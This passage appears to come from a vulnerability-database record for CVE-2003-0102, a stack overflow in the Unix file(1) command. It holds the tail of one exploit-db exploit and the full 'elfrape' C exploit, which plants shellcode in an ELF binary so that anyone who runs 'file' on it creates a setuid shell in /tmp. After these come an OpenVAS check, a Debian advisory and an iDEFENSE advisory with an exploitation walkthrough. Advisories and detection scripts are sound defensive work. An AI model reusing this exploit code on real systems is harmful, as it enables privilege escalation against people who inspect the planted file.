code_len);\r\n /* file requires the following shit */\r\n ehdr->e_ident[0] = 0x7f; /* elf magic shit */\r\n ehdr->e_ident[1] = 'E';\r\n ehdr->e_ident[2] = 'L';\r\n ehdr->e_ident[3] = 'F';\r\n ehdr->e_ident[4] = 0x01;/* 32 bit objects */\r\n ehdr->e_ident[5] = 0x01;/* LSB */\r\n ehdr->e_type = ET_EXEC;/* if you wanna know, go google it */\r\n ehdr->e_machine = EM_VPP500;\r\n ehdr->e_version = EV_CURRENT;\r\n ehdr->e_shoff = sizeof (Elf32_Ehdr);\r\n ehdr->e_ehsize = sizeof (Elf32_Ehdr);\r\n ehdr->e_shentsize = 2048;\r\n ehdr->e_shnum = 0x0001;\r\n for (ix = 0; ix < 256; ix += 4)\r\n {\r\n *(long *) (attackbuff + ehdr->e_ehsize + ix) = get_sp () - 1500;\r\n }\r\n if ((fd = open (argv[1], O_WRONLY | O_CREAT | O_TRUNC)) < 0)\r\n {\r\n perror (\"open()\");\r\n exit (-1);\r\n }\r\n if (write (fd, attackbuff, FILESIZE) == -1)\r\n {\r\n perror (\"write()\");\r\n exit (-1);\r\n }\r\n close (fd);\r\n free (shell);\r\n free (final_code);\r\n fprintf (stderr,\r\n \"Use /tmp/.sh to gain the targets uid once they run 'file %s'\\n\",\r\n argv[1]);\r\n fprintf (stderr, \"Make sure the shell you copied doesn't drop privs\\n\");\r\n return 0;\r\n}\r\n/* this func allows for the shellcode to echo out legit results for file */\r\nunsigned char *\r\nprepare_code (unsigned char *os_code, unsigned char *filename,\r\n unsigned char *shell, int *len)\r\n{\r\n unsigned char *complete;\r\n *len = strlen (os_code);\r\n *len += strlen (cmd);\r\n *len += strlen (filename) - 2;\r\n *len += strlen (shell) - 2;\r\n if (!(complete = (char *) malloc (*len)))\r\n {\r\n fprintf (stderr, \"malloc error\\n\");\r\n exit (-1);\r\n }\r\n memcpy (complete, os_code, strlen (os_code));\r\n sprintf (complete + strlen (os_code), cmd, filename, shell, shell, shell,\r\n shell);\r\n return complete;\r\n}\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22325/"}, {"lastseen": "2016-02-02T18:29:07", "bulletinFamily": "exploit", "description": "File 3.x Local Stack Overflow Code Execution Vulnerability (1). CVE-2003-0102. Local exploit for unix platform", "modified": "2003-03-04T00:00:00", "published": "2003-03-04T00:00:00", "id": "EDB-ID:22324", "href": "https://www.exploit-db.com/exploits/22324/", "type": "exploitdb", "title": "File 3.x - Local Stack Overflow Code Execution Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/7008/info\r\n\r\nIt has been reported that a stack overflow exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to execute code as the user invoking file. \r\n\r\n/*\r\n** elfrape BY lem0n (lem0nxx@hotmail.com)\r\n** a glorified stack overflow in file<=3.39 \r\n**\r\n** \"lame code for a lame bug\"\r\n**\r\n** this bug was discovered by iDEFENSE retards\r\n** (actually i discovered it and they bought it from \r\n** me for $8, all that it is really worth)\r\n**\r\n** this code is mainly proof of concept and it has very little use\r\n** \"in the wild\" unless your sysadmins and friends are morons.\r\n**\r\n** specify a valid elf binary, and elfrape will patch it so that\r\n** it will exploit a stack overflow in file<=3.39. this exploit\r\n** relies on the victim user (possibly root, but not required) to\r\n** run file <patchedbinary>.\r\n**\r\n** a glorified stack overflow in file<=3.39\r\n** \r\n** file-3.37/readelf.c:tryelf()\r\n** doshn(class, swap,\r\n** fd,\r\n** getu32(swap, elfhdr.e_shoff),\r\n** getu16(swap, elfhdr.e_shnum),\r\n** getu16(swap, elfhdr.e_shentsize));\r\n**\r\n** note that we can manipulate elfhdr. \r\n** in doshn() we find a very bad thing...\r\n**\r\n** file-3.37/readelf.c:doshn()\r\n** if (read(fd, sh_addr, size) == -1)\r\n**\r\n** now, fd is the file its processing, sh_addr is the address of a 32 byte char. \r\n** size is the value read from the header (elfhdr.e_shentsize). So we make \r\n** e_shentsize bigger then it should and voila, we got eip pretty easily. \r\n** the shellcode cant easily be placed after the address however because file is very \r\n** sensitive about its fd and the loop variable num being overwritten (it will either\r\n** complain about bad fd and exit or hang in the loop). trying to preserve the values of\r\n** each seemed stupid, so i found the best spot for\r\n** the shellcode placement was in the beginning of the file, after the elf header\r\n** because in the beginning of processing, file reads HOWMANY bytes from the start of the\r\n** file onto the stack.\r\n** \r\n** #define HOWMANY 16384\r\n**\r\n** that makes for a pretty large landing pad, pop a few thousand nops in there\r\n** and this should be a pretty reliable method.\r\n**\r\n** the shellcode also makes sure to output a seemingly genuine result, which will\r\n** always be filename: data\r\n**\r\n** (16:11)[lem0n@keystone:~/audit/file]$cp /bin/sln sln\r\n** (16:11)[lem0n@keystone:~/audit/file]$./elfrape -t 0 -f sln\r\n** elfrape file<=3.39 priveledge escalation exploit (by lem0n (lem0nxx@hotmail.com)\r\n** [patching sln, trying to hit 0xbfffbab0]\r\n** [setting section header size to trigger overwrite (0x32 bytes)]\r\n** [setting section header entries to 1 to avoid a big mess on the stack]\r\n** [writing new header to file]\r\n** [writing target address to file @offset 0x5f4f0]\r\n** [filling file with nops and shell code @offset 0x34]\r\n** [exploit done]\r\n** after someone runs 'file sln', execute /tmp/.sh\r\n** (16:11)[lem0n@keystone:~/audit/file]$cp sln /tmp/whatami\r\n** (16:11)[lem0n@keystone:~/audit/file]$echo and now we wait...\r\n**\r\n** typical sp offsets for -o mode are from -2000 to -6000 \r\n** \r\n** Will create a 6755 /bin/.sh :>\r\n** \r\n** Note: may not work if used on files less than 8k or so.\r\n*/\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <sys/types.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#define MAX_FILENAME 17/* the longest filename i suggest you use */\r\n#define SHELL \"/bin/ash\"/* a shell that doesnt do seteuid(getuid()); ash,ksh,zsh,etc */\r\n#define LANDING_SIZE 8192/* pretty big considering its just nops and shellcode */\r\n/* shellcode shamelessly stolen (from ?) and modified */\r\nchar shellcode[] =\r\n \"\\x31\\xc0\\x31\\xdb\\x31\"\r\n \"\\xd2\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x68\" \"\\x00\\x00\\x00\\x00\"\r\n \"\\x89\\xe1\\xb2\\x20\\x43\\xb0\\x04\\xcd\\x80\\x31\\xc0\"\r\n \"\\xeb\\x31\\x5e\\x89\\x76\\xac\\x8d\\x5e\\x08\\x89\\x5e\\xb0\"\r\n \"\\x8d\\x5e\\x0b\\x89\\x5e\\xb4\\x31\\xc0\\x88\\x46\\x07\\x88\"\r\n \"\\x46\\x0a\\x88\\x46\\xab\\x89\\x46\\xb8\\xb0\\x0b\\x89\\xf3\"\r\n \"\\x8d\\x4e\\xac\\x8d\\x56\\xb8\\xcd\\x80\\x31\\xdb\\x89\\xd8\"\r\n \"\\x40\\xcd\\x80\\xe8\\xca\\xff\\xff\\xff/bin/sh -c \"\r\n \"/bin/cp \" SHELL \" /tmp/.sh;chmod 6755 /tmp/.sh\";\r\n#define EI_NIDENT 16\r\ntypedef unsigned short int Elf32_Half;\r\ntypedef unsigned long int Elf32_Word;\r\ntypedef unsigned long int Elf32_Addr;\r\ntypedef unsigned long int Elf32_Off;\r\ntypedef struct\r\n{\r\n unsigned char e_ident[EI_NIDENT];\r\n Elf32_Half e_type;\r\n Elf32_Half e_machine;\r\n Elf32_Word e_version;\r\n Elf32_Addr e_entry;\r\n Elf32_Off e_phoff;\r\n Elf32_Off e_shoff;\r\n Elf32_Word e_flags;\r\n Elf32_Half e_ehsize;\r\n Elf32_Half e_phentsize;\r\n Elf32_Half e_phnum;\r\n Elf32_Half e_shentsize;\r\n Elf32_Half e_shnum;\r\n Elf32_Half e_shtrndx;\r\n}\r\nElf32_Ehdr;\r\nstruct targets\r\n{\r\n int target;\r\n char *description;\r\n Elf32_Half e_shentsize;\r\n Elf32_Off e_shoff_delta;\r\n unsigned long int addr;\r\n};\r\nstruct targets targets[] = {\r\n {0, \"Slackware 8.1 (file-3.37-3.1)\", 50, 44, 0xbfffc19c},\r\n {1, \"Red Hat Linux release 7.2 (Enigma) (file-3.35)\", 80, 76, 0xbfffc19c},\r\n {2, \"Red Hat Linux release 6.2 (Zoot) (file-3.28)\", 50, 44, 0xbfffc19c},\r\n {0, NULL, 0, 0, 0}\r\n};\r\nextern char *optarg;\r\nextern int optind;\r\nvoid prepare_write_shellcode (char *program);\r\nunsigned long get_sp (void);\r\nvoid usage (char *argv0);\r\nunsigned long\r\nget_sp (void)\r\n{\r\n __asm__ (\"movl %esp,%eax\");\r\n}\r\nint\r\nmain (int argc, char *argv[])\r\n{\r\n int offset, fd, ix, nbytes, c, target = -1;\r\n unsigned char buff[sizeof (Elf32_Ehdr)];\r\n unsigned char attack[LANDING_SIZE];\r\n unsigned char *file = NULL;\r\n Elf32_Ehdr *ehdr;\r\n Elf32_Off e_shoff;\r\n Elf32_Half e_shnum;\r\n Elf32_Half e_shentsize = 50;\r\n Elf32_Off e_shoff_delta;\r\n unsigned long int addr = 1;\r\n while ((c = getopt (argc, argv, \"t:f:o:\")) != -1)\r\n {\r\n switch (c)\r\n{\r\ncase 't':\r\n target = atoi (optarg);\r\n break;\r\ncase 'f':\r\n file = (char *) strdup (optarg);\r\n break;\r\ncase 'o':\r\n addr = 0;\r\n offset = atoi (optarg);\r\n break;\r\ndefault:\r\n usage (argv[0]);\r\n break;\r\n}\r\n }\r\n printf\r\n (\"elfrape file<=3.39 priveledge escalation exploit (by lem0n (lem0nxx@hotmail.com)\\n\");\r\n if (!(file) || ((target == -1) && (addr)))\r\n usage (argv[0]);\r\n if (strchr(file,'/'))\r\n { printf(\"NO fucking slashes douchebag\\n\"); exit(-1); }\r\n \r\n if (strlen(file) > MAX_FILENAME)\r\n { printf(\"Smaller filename please, unless you feel like editing the shell code\\n\");exit(-1); }\r\n if (target >= 0)\r\n {\r\n if (target >= sizeof (targets) / sizeof (targets[0]) - 1)\r\n{\r\n fprintf (stderr, \"Invalid type\\n\");\r\n exit (-1);\r\n}\r\n e_shentsize = targets[target].e_shentsize;\r\n e_shoff_delta = targets[target].e_shoff_delta;\r\n addr = targets[target].addr;\r\n }\r\n if ((fd = open (file, O_RDWR)) < 0)\r\n {\r\n perror (\"open()\");\r\n exit (-1);\r\n }\r\n if ((nbytes = read (fd, (char *) buff, sizeof (Elf32_Ehdr))) == -1)\r\n {\r\n error (\"read failed (%s).\\n\", strerror (errno));\r\n exit (-1);\r\n }\r\n ehdr = (Elf32_Ehdr *) buff;\r\n if (addr == 0)\r\n addr = get_sp () - offset;/* we have a big enough landing point that this addr should work */\r\n printf (\" [patching %s, tring to hit 0x%x]\\n\", file, addr);\r\n printf\r\n (\" [setting section header size to trigger overwrite (0x%x bytes)]\\n\",\r\n e_shentsize);\r\n ehdr->e_shentsize = e_shentsize;\r\n printf\r\n (\" [setting section header entries to 1 to avoid a big mess on the stack]\\n\");\r\n ehdr->e_shnum = 1;\r\n/* write the new elf header to the file */\r\n printf (\" [writing new header to file]\\n\");\r\n if (lseek (fd, 0, SEEK_SET) == (off_t) - 1)\r\n {\r\n perror (\"lseek()\");\r\n exit (-1);\r\n }\r\n if (write (fd, buff, sizeof (*ehdr)) == -1)\r\n {\r\n perror (\"write()\");\r\n exit (-1);\r\n }\r\n/* seek to where we want our address to wait */\r\n printf (\" [writing target address to file @offset 0x%x]\\n\",\r\n ehdr->e_shoff + e_shoff_delta);\r\n if (lseek (fd, ehdr->e_shoff + e_shoff_delta, SEEK_SET) == (off_t) - 1)\r\n {\r\n perror (\"lseek()\");\r\n exit (-1);\r\n }\r\n write (fd, &addr, 4);\r\n memset (attack, 0x90, LANDING_SIZE);\r\n prepare_write_shellcode (file);\r\n memcpy (attack + LANDING_SIZE - sizeof (shellcode) - 1, shellcode,\r\n sizeof (shellcode));\r\n attack[LANDING_SIZE - 1] = 0x0;\r\n printf (\" [filling file with nops and shell code @offset 0x%x]\\n\",\r\n sizeof (*ehdr));\r\n/* set offset to just after the header, where our code will be */\r\n if (lseek (fd, sizeof (*ehdr), SEEK_SET) == (off_t) - 1)\r\n {\r\n perror (\"lseek()\");\r\n exit (-1);\r\n }\r\n if (write (fd, attack, LANDING_SIZE) == -1)\r\n {\r\n perror (\"write()\");\r\n exit (-1);\r\n }\r\n printf (\" [exploit done]\\n\");\r\n printf (\"after someone runs 'file %s', execute /tmp/.sh\\n\", file);\r\n close (fd);\r\n return 0;\r\n}\r\nvoid\r\nusage (char *argv0)\r\n{\r\n int ix = 0;\r\n printf (\"Usage: %s -t <target num> -f <existing elf binary filename>\\n\",\r\n argv0);\r\n printf\r\n (\" %s -o <offset from sp> -f <existing elf binary filename>\\n\\n\",\r\n argv0);\r\n while (targets[ix].target || ix == 0)\r\n {\r\n printf (\"\\t#%d: %s\\n\", targets[ix].target, targets[ix].description);\r\n ix++;\r\n }\r\n exit (-1);\r\n}\r\n/* a quick and dirty hack to let the shellcode have the correct filename */\r\nvoid\r\nprepare_write_shellcode (char *program)\r\n{\r\n char *buf;\r\n int ix;\r\n char *ptr = shellcode + 37;\r\n buf = (char *) malloc (strlen (program) + strlen (\": data\\n\"));\r\n memcpy (buf, program, strlen (program));\r\n memcpy (buf + strlen (program), \": data\\n\", 7);\r\n for (ix = 0; ix < strlen (buf); ix++)\r\n {\r\n if (ix && (ix % 4 == 0))\r\nptr -= 9;\r\n *ptr = buf[ix];\r\n ptr++;\r\n }\r\n free (buf);\r\n return;\r\n}\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22324/"}], "openvas": [{"lastseen": "2017-07-24T12:50:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update to file\nannounced via advisory DSA 260-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53591", "id": "OPENVAS:53591", "title": "Debian Security Advisory DSA 260-1 (file)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_260_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 260-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"iDEFENSE discovered a buffer overflow vulnerability in the ELF format\nparsing of the 'file' command, one which can be used to execute\narbitrary code with the privileges of the user running the command. The\nvulnerability can be exploited by crafting a special ELF binary which is\nthen input to file. This could be accomplished by leaving the binary on\nthe file system and waiting for someone to use file to identify it, or\nby passing it to a service that uses file to classify input. (For\nexample, some printer filters run file to determine how to process input\ngoing to a printer.)\n\nFixed packages are available in version 3.28-1.potato.1 for Debian 2.2\n(potato) and version 3.37-3.1.woody.1 for Debian 3.0 (woody). We\nrecommend you upgrade your file package immediately.\";\ntag_summary = \"The remote host is missing an update to file\nannounced via advisory DSA 260-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20260-1\";\n\nif(description)\n{\n script_id(53591);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:28:10 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0102\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 260-1 (file)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"file\", ver:\"3.28-1.potato.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"file\", ver:\"3.37-3.1.woody.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:21:26", "bulletinFamily": "unix", "description": "- ----------------------------------------------------------------------------\nDebian Security Advisory DSA-260-1 security@debian.org\nhttp://www.debian.org/security/ Michael Stone\nMarch 13, 2003 http://www.debian.org/security/faq\n- ----------------------------------------------------------------------------\n\nPackage: file\nVulnerability: buffer overflow\nDebian-specific: no\nCVE Id: CAN-2003-0102\n\niDEFENSE discovered a buffer overflow vulnerability in the ELF format\nparsing of the "file" command, one which can be used to execute\narbitrary code with the privileges of the user running the command. The\nvulnerability can be exploited by crafting a special ELF binary which is\nthen input to file. This could be accomplished by leaving the binary on\nthe file system and waiting for someone to use file to identify it, or\nby passing it to a service that uses file to classify input. (For\nexample, some printer filters run file to determine how to process input\ngoing to a printer.)\n\nFixed packages are available in version 3.28-1.potato.1 for Debian 2.2\n(potato) and version 3.37-3.1.woody.1 for Debian 3.0 (woody). We\nrecommend you upgrade your file package immediately.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nFor not yet released architectures please refer to the appropriate\ndirectory ftp://ftp.debian.org/debian/dists/sid/binary-$arch/ .\n\n\nDebian 2.2 (potato)\n- ----------------------\n\n Debian 2.2 (potato) was released for alpha, arm, i386, m68k, powerpc and sparc.\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1.dsc\n Size/MD5 checksum: 639 85bbfb52d13c084a9029f3552d7e1dfe\n http://security.debian.org/pool/updates/main/f/file/file_3.28.orig.tar.gz\n Size/MD5 checksum: 124529 a6bdc66e9c6af58da6977a57923c02c0\n http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1.diff.gz\n Size/MD5 checksum: 31736 9c23fac99161cc9a5e133be542fe0226\n\n alpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_alpha.deb\n Size/MD5 checksum: 92170 18bdf5775e40243e7e17ebac7dbed730\n\n arm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_arm.deb\n Size/MD5 checksum: 88572 c51e09397b04358ab7e42c710dab4ca9\n\n i386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_i386.deb\n Size/MD5 checksum: 88164 9a1945e7449e5bc243fd22af2cfb15a2\n\n m68k architecture (Motorola Mc680x0)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_m68k.deb\n Size/MD5 checksum: 87186 1348a858e3715d25c862648c41ac793f\n\n powerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_powerpc.deb\n Size/MD5 checksum: 89346 b7190fd329df08377dc922d014d46195\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_sparc.deb\n Size/MD5 checksum: 91412 032448fa4cf7b4bc4d8ce3bbe7470a3f\n\nDebian 3.0 (woody)\n- -------------------\n\n Debian 3.0 (woody) was released for alpha, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1.diff.gz\n Size/MD5 checksum: 47683 5653fa12fb92b465017b7fb847591bc5\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1.dsc\n Size/MD6 checksum: 678 9e5705581862d737a338471bfa031617\n http://security.debian.org/pool/updates/main/f/file/file_3.37.orig.tar.gz\n Size/MD5 checksum: 166623 5743b2fc24743b6188504762d40c0b4c\n\n alpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_alpha.deb\n Size/MD5 checksum: 180780 814139b8680577450d416fb386737d56\n\n arm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_arm.deb\n Size/MD5 checksum: 177040 b49fb60a60641cf5e27dea7b44338938\n\n hppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_hppa.deb\n Size/MD5 checksum: 179412 2388427c4f52ca11e2ac00b0d12e1b42\n\n i386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_i386.deb\n Size/MD5 checksum: 175246 ebac35a75aebe97cad2ebbfffe000f82\n\n ia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_ia64.deb\n Size/MD5 checksum: 184942 934d1a23acd4e343e390ebed66f2101e\n\n m68k architecture (Motorola Mc680x0)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_m68k.deb\n Size/MD5 checksum: 174058 69c08b32893304e1a821793ecf193393\n\n mips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_mips.deb\n Size/MD5 checksum: 178576 f913464347dde9972ec2c80b29393f6b\n\n mipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_mipsel.deb\n Size/MD5 checksum: 178460 0ce50ff45b9db314a737c8002e3bcb9c\n\n powerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_powerpc.deb\n Size/MD5 checksum: 177072 f43bc712f83b2cad0e4f3e40b1d491e7\n\n s390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_s390.deb\n Size/MD5 checksum: 177980 305395cc6fed6830697b7f39984d01d3\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_sparc.deb\n Size/MD5 checksum: 179316 b957e930f657cd1674ef66a38ae2dbb0\n\n- ----------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2003-03-13T00:00:00", "published": "2003-03-13T00:00:00", "id": "DEBIAN:DSA-260-1:4057C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00043.html", "title": "[SECURITY] [DSA-260-1] New file package fixes buffer overflow", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:07", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDEFENSE Security Advisory 03.04.03:\r\nhttp://www.idefense.com/advisory/03.04.03.txt\r\nLocally Exploitable Buffer Overflow in file(1)\r\nMarch 4, 2003\r\n\r\nI. BACKGROUND\r\n\r\nfile(1) is an application that utilizes a magic file (typically located in\r\n/usr/share/magic) to classify arbitrary files. The latest version of\r\nfile(1) is available for download from: ftp://ftp.astron.com/pub/file . \r\nFor example:\r\n\r\n $ file\r\n Usage: file [-bcnvzL] [-f namefile] [-m magicfiles] file...\r\n \r\n $ file unknown_file\r\n unknown_file: ASCII text\r\n\r\n\r\nII. DESCRIPTION\r\n\r\nThe file(1) command contains a buffer overflow vulnerability that can be\r\nleveraged by an attacker to execute arbitrary code under the privileges of\r\nanother user.\r\n\r\nThe crux of the problem lies in the following call to doshn() from\r\ntryelf() on line 587 in readelf.c:\r\n\r\n doshn(class, swap,\r\n fd,\r\n getu32(swap, elfhdr.e_shoff),\r\n getu16(swap, elfhdr.e_shnum),\r\n getu16(swap, elfhdr.e_shentsize));\r\n\r\nThe final argument to doshn() 'elfhdr.e_shentsize' is later used in a call\r\nto read() as can be see here on line 133 in readelf.c:\r\n\r\n if (read(fd, sh_addr, size) == -1)\r\n\r\nThe call to read() will copy 'size' bytes into the variable 'sh_addr'\r\nwhich is defined on line 92 in readelf.c:\r\n\r\n #define sh_addr (class == ELFCLASS32 \\r\n ? (void *) &sh32 \\r\n : (void *) &sh64)\r\n\r\nThe storage buffer used in the call to read() is of size 0x20 (32) bytes,\r\nby supplying a 'size' of 0x28 (40) a stack overflow occurs overwriting the\r\nstored frame pointer (EBP) and instruction pointer (EIP) thereby providing\r\nthe attacker with CPU control and the ability to execute arbitrary code.\r\n\r\nIII. ANALYSIS\r\n\r\nA user who can successfully convince another user to examine a specially\r\nconstructed exploit file with the file(1) command can execute arbitrary\r\ncode under the privileges of that user.\r\n\r\nThe following is a sample walkthrough of a successful exploitation. The\r\nattacker must initially generate a file that is specially structured to\r\ntrigger a buffer overflow in the file(1) command:\r\n\r\n $ ./mkfile_expl -C /tmp/suid -F /tmp/exploit -O "ASCII text" -R\r\n/bin/bash -p 1\r\n\r\n Local /usr/bin/file upto v3.39 exploit by anonymous\r\n \r\n Using PRESET: 1 [Linux file <= 3.38 ]\r\n \r\n Using FILENAME: /tmp/exploit\r\n Using REAL_SHELL: /bin/bash\r\n Using CREATED_SHELL: /tmp/suid\r\n Using OUTPUT: ASCII text\r\n \r\n Using RET_ADDR: 0xbfffc3f0\r\n Using NOP_COUNT: 6000\r\n \r\n Exploit created -> /tmp/exploit\r\n Time to wait till somebody starts /usr/bin/file /tmp/exploit\r\n\r\nOnce the tainted file has been generated the attacker must wait for or\r\ncoerce another user to examine the file with the file(1) command.\r\n\r\n # ls -l exploit\r\n -rwxr-xr-x 1 farmer farmer 6406 Jan 11 22:07 exploit\r\n \r\n # file exploit\r\n /tmp/exploit: ASCII text\r\n\r\nThe file(1) command reports that the examined file is "ASCII text" as the\r\nattacker specified in the creation of the exploit file. At this point if\r\nthe attack was a success the original attack file (exploit) has been\r\nerased and a set user id shell has been created:\r\n\r\n # ls -l exploit\r\n ls: exploit: No such file or directory\r\n \r\n $ ls -l suid\r\n -rwsr-sr-x 1 root root 541096 Jan 11 22:07 suid\r\n\r\nIV. DETECTION\r\n\r\niDEFENSE has successfully exploited file(1) versions 3.37 and 3.39. It is\r\nsuspected that all versions up to and including 3.39 are vulnerable.\r\n\r\nV. VENDOR FIX/RESPONSE\r\n\r\nThe latest version of file(1) fixes this issue and is available from\r\nftp://ftp.astron.com/pub/file/file-3.41.tar.gz . Specific vendors will be\r\nshipping updated packages in the near future.\r\n\r\nVI. CVE INFORMATION\r\n\r\nThe Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has\r\nassigned the identification number CAN-2003-0102 to this issue.\r\n\r\nVII. DISCLOSURE TIMELINE\r\n\r\n12/16/2002 Issue disclosed to iDEFENSE\r\n02/24/2003 Maintainers notified: mail_contact@darwinsys.com\r\n02/24/2003 Response from Ian Darwin, ian@darwinsys.com\r\n02/25/2003 Response received from christos@zoulas.com\r\n02/25/2003 iDEFENSE clients notified\r\n02/27/2003 OS vendors notified via vendor-sec@lst.de\r\n03/04/2003 Public Disclosure\r\n\r\nVIII. CREDIT\r\n\r\nAn anonymous researcher discovered this vulnerability.\r\n\r\n\r\nGet paid for security research\r\nhttp://www.idefense.com/contributor.html\r\n\r\nSubscribe to iDEFENSE Advisories:\r\nsend email to listserv@idefense.com, subject line: "subscribe"\r\n\r\n\r\nAbout iDEFENSE:\r\n\r\niDEFENSE is a global security intelligence company that proactively\r\nmonitors sources throughout the world \u2014 from technical\r\nvulnerabilities and hacker profiling to the global spread of viruses\r\nand other malicious code. Our security intelligence services provide \r\ndecision-makers, frontline security professionals and network \r\nadministrators with timely access to actionable intelligence\r\nand decision support on 